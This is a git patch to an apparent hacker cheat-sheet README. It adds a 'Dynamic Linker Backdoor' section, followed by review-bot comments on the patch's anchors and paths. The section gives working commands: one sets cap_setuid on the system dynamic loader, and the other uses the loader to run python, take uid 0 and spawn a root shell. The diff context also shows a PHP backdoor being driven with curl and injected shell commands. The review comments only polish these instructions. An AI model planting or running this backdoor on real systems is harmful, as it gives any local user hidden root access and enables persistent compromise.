From 338d966bce0470c4d2bc61ce868c10ee2561c29e Mon Sep 17 00:00:00 2001 From: Jacopo Cavallo Date: Mon, 29 May 2023 15:05:45 +0200 Subject: [PATCH] add dynamic linker backdoor --- README.md | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/README.md b/README.md index 38157c4..cc1b93e 100644 --- a/README.md +++ b/README.md @@ -55,6 +55,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg) 1. [authorized_keys](#backdoor-auth-keys) 1. [Remote access an entire network](#backdoor-network) 1. [Smallest PHP backdoor](#carriage-return-backdoor) + 1. [Dynamic Linker backdoor](#ld-backdoor) 1. [Shell Hacks](#shell-hacks) 1. [Shred files (secure delete)](#shred) 1. [Restore the date of a file](#restore-timestamp) @@ -1100,6 +1101,18 @@ curl http://127.0.0.1:8080/test.php curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id" ``` + +**6.v. Dynamic Linker Backdoor** + +Give the setuid capability to the dynamic linker: +```bash +sudo setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 +``` +Then to become root: +```bash +/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")' +``` + --- ## 7. Shell Hacks
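Review bot: the table-of-contents entry added in the `@@ -55,6 +55,7` hunk links to `#ld-backdoor`, but the section added in the second hunk shows no anchor with that id ahead of `**6.v. Dynamic Linker Backdoor**`, only an empty added line. Add the matching anchor in whatever form the neighbouring sections use for `#backdoor-network` and `#carriage-return-backdoor`, otherwise the new link will not resolve.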
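Review bot: the section added in the `@@ -1100,6 +1101,18` hunk hard-codes `/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2` in both commands without saying that this is the x86_64 Debian/Ubuntu multiarch location; on other architectures or distributions the loader lives elsewhere and the `setcap` line fails. Say which systems the path applies to. The text is also missing two things a reader needs: that `cap_setuid+ep` is a file capability, so it applies to every account able to execute the loader and not only the one that set it, and how to inspect and undo the change. One line for each would do, for example `getcap /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2` to check and `sudo setcap -r` on the same path to remove it.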